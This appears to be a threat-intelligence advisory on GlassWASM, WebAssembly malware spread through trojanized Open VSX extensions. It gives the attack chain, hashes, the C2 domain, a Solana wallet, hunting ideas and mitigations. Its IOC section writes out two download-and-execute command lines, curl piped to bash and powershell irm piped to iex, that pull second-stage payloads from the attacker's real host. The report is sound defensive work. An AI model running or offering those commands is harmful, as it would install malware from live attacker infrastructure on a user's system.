GlassWASM: WebAssembly Malware Found in Trojanized Open VSX Extensions
Threat researchers discovered GlassWASM, a WebAssembly-based malware distributed via trojanized extensions on the Open VSX marketplace. The malware uses ChaCha20 encryption to evade static analysis and leverages the Solana blockchain as a resilient C2 dead-drop to retrieve and execute OS-specific second-stage payloads via Node.js.
- domaindodod[.]latResolved C2 / second-stage host retrieved from the Solana blockchain memo.
- md54e143876eeaf5e767a9971f603b0f13cWebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm).
- md5b262b8d2ac2f0ab3c78251db44ecf3acMalicious extension package: noellee-doc.flint-debug-0.1.1.vsix.
- md5f595fb7867beb76b4deab53fa328e0a2Malicious extension package: exargd.vsblack-0.0.1.vsix.
- sha1824e601b599b9ad97ee12f0b3a72efd20ba59d47Malicious extension package: exargd.vsblack-0.0.1.vsix.
- sha18ebac142e34a20c297d3ccaca7ee5d9ddd24fed4WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm).
- sha1c0ed7d575fe8085e942898c9a26f15992c895ba9Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix.
- sha2561e283327ad048bea39f4a8501770858a20f3555e87fe3e202274f2e87f8a3c25Malicious extension package: exargd.vsblack-0.0.1.vsix.
- sha2563aa31999398e7f80231c03d7137ffdb554a84b83dbcffc59ce16c9a65f9e5d58Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix.
- sha256558b4f1d9a263c13756ab0126c09dd080c85ba405b29488e1c4e6aa68b554f1fWebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm).
- urlhxxps://dodod[.]lat/darwin/i/_macOS second-stage download URL.
- urlhxxps://dodod[.]lat/linux/i/_Linux second-stage download URL.
- urlhxxps://dodod[.]lat/win32/i/_Windows second-stage download URL.
Detection / HunterGoogle
What Happened
Attackers uploaded fake versions of popular developer tools to the Open VSX marketplace, which is used by many code editors. When installed, these fake tools run hidden malicious code written in WebAssembly. This code secretly checks the Solana cryptocurrency network for instructions on what to do next, making it very hard to block. It then downloads and runs additional malware tailored to the victim's operating system (Windows, Mac, or Linux). Developers using alternative code editors like VSCodium or Cursor should check their installed extensions and remove the malicious ones.
Key Takeaways
- Trojanized VS Code extensions on the Open VSX marketplace deliver evasive WebAssembly (WASM) malware.
- The WASM payload uses ChaCha20 encryption to hide all strings and network indicators from static analysis.
- The malware uses the Solana blockchain as a takedown-resistant C2 dead-drop, reading instructions from the SPL Memo field.
- It executes OS-specific second-stage payloads via Node.js child_process using 'curl | bash' or 'irm | iex'.
- The campaign is attributed to the GlassWorm threat actor, marking a pivot to binary loading for obfuscation.
Affected Systems
- VS Code forks using Open VSX (VSCodium, Cursor, Windsurf, Gitpod)
- Node.js environments
- Windows
- macOS
- Linux
Attack Chain
The attack begins with the victim installing a trojanized extension from the Open VSX registry. Upon activation, a JavaScript loader instantiates an obfuscated WebAssembly (WASM) module. The WASM module decrypts its strings in memory using ChaCha20 and queries the Solana blockchain to read an attacker-controlled SPL Memo field. This memo provides the C2 domain, which the malware uses to construct and execute an OS-specific download-and-execute command via Node's child_process, fetching a second-stage payload.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
The article does not provide explicit detection rules but outlines behavioral detection strategies, such as monitoring Node.js processes spawning shells or making unexpected JSON-RPC calls to Solana endpoints.
Detection Engineering Assessment
EDR Visibility: High — EDRs have strong visibility into process creation events, specifically Node.js spawning bash, sh, curl, or powershell with hidden windows. Network Visibility: Medium — While the C2 payload retrieval is over HTTPS and the Solana RPC calls blend with legitimate traffic, the specific JSON-RPC payload structures and the C2 domain dodod.lat can be detected with SSL inspection or DNS logging. Detection Difficulty: Moderate — Static analysis is difficult due to WASM and ChaCha20 obfuscation, but behavioral detection of the execution chain (Node spawning shells) is highly reliable.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon Event ID 1)
- DNS Query Logs
- Network Connection Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Node.js processes spawning shell interpreters (bash, sh, powershell) or downloaders (curl) may indicate malicious extension activity. | Process Creation Logs (EDR/Sysmon) | Execution | Medium (Some legitimate Node.js build scripts or tools may spawn shells, but 'curl |
| Unexpected outbound JSON-RPC traffic to Solana mainnet endpoints from developer workstations may indicate blockchain-based C2 resolution. | Network/Proxy Logs | Command and Control | Medium (Legitimate Web3 developers will have this traffic, but it is anomalous for general developers) |
Control Gaps
- Static AV scanning of WASM files
- Trust in third-party extension registries (Open VSX)
Key Behavioral Indicators
- Node.js spawning processes with windowsHide: true
- WASM modules importing gojs.syscall/js.*
- Process command lines containing 'curl -fsSL ... | bash' or 'irm ... | iex'
False Positive Assessment
- Low for the specific IOCs (domain, hashes). Medium for behavioral hunts (Node.js spawning shells), as some legitimate developer tools may exhibit similar process trees.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting.
- Search for and remove the trojanized extensions [email protected] and noellee-doc/[email protected] from VS Code forks (VSCodium, Cursor, Windsurf, Gitpod).
- Block the C2 domain dodod.lat and the associated download URLs at the network perimeter.
- If an infection is confirmed, consider rotating developer, CI, cloud, and npm credentials reachable from the affected environment.
Infrastructure Hardening
- Evaluate whether to restrict outbound access to cryptocurrency RPC endpoints (e.g., api.mainnet.solana.com) for non-Web3 developer workstations.
- Consider implementing strict extension allowlists for VS Code and its forks to prevent the installation of unverified or impersonated extensions.
User Protection
- Ensure EDR solutions are configured to monitor and alert on suspicious child processes spawned by Node.js.
- If applicable, incorporate WASM-aware analysis tools (like wasm2c or wabt) into CI/CD and package-vetting pipelines.
Security Awareness
- Educate developers on the risks of third-party extension registries like Open VSX and the importance of verifying publisher authenticity.
MITRE ATT&CK Mapping
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1140 - Deobfuscate/Decode Files or Information
- T1102.001 - Web Service: Dead Drop Resolver
- T1059.007 - Command and Scripting Interpreter: JavaScript
- T1564.003 - Hide Artifacts: Hidden Window
Additional IOCs
- File Hashes:
8ebac142e34a20c297d3ccaca7ee5d9ddd24fed4(SHA1) - WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm).4e143876eeaf5e767a9971f603b0f13c(MD5) - WebAssembly payload (snqpkebiwrxmoivl.wasm / orybbbdsuqmaapel.wasm).c0ed7d575fe8085e942898c9a26f15992c895ba9(SHA1) - Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix.b262b8d2ac2f0ab3c78251db44ecf3ac(MD5) - Malicious extension package: noellee-doc.flint-debug-0.1.1.vsix.824e601b599b9ad97ee12f0b3a72efd20ba59d47(SHA1) - Malicious extension package: exargd.vsblack-0.0.1.vsix.f595fb7867beb76b4deab53fa328e0a2(MD5) - Malicious extension package: exargd.vsblack-0.0.1.vsix.
- File Paths:
snqpkebiwrxmoivl.wasm- WebAssembly payload filename.orybbbdsuqmaapel.wasm- WebAssembly payload filename.
- Command Lines:
- Purpose: Download and execute second-stage payload on Unix/macOS | Tools:
curl,bash,node| Stage: Execution |curl -fsSL https://dodod.lat/linux/i/_ | bash - Purpose: Download and execute second-stage payload on Windows | Tools:
powershell,node| Stage: Execution |powershell -Command "irm https://dodod.lat/win32/i/_ | iex"
- Purpose: Download and execute second-stage payload on Unix/macOS | Tools:
- Other:
6ExrZayPZzMMSnszc42cH81DpuKT8FhCX9H6Sesn6rpz- Attacker-controlled Solana wallet polled for instructions.MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr- SPL Memo program v2 parsed for attacker payload.Memo1UhkJRfHyvLMcVucJwxXeuD728EqVDDwQDxFM- SPL Memo program v1 parsed for attacker payload.github.com/zaitoona43- Threat actor GitHub account used to publish malicious extensions.vscode/exargd/[email protected]- Malicious Open VSX package namespace and version.vscode/noellee-doc/[email protected]- Malicious Open VSX package namespace and version.
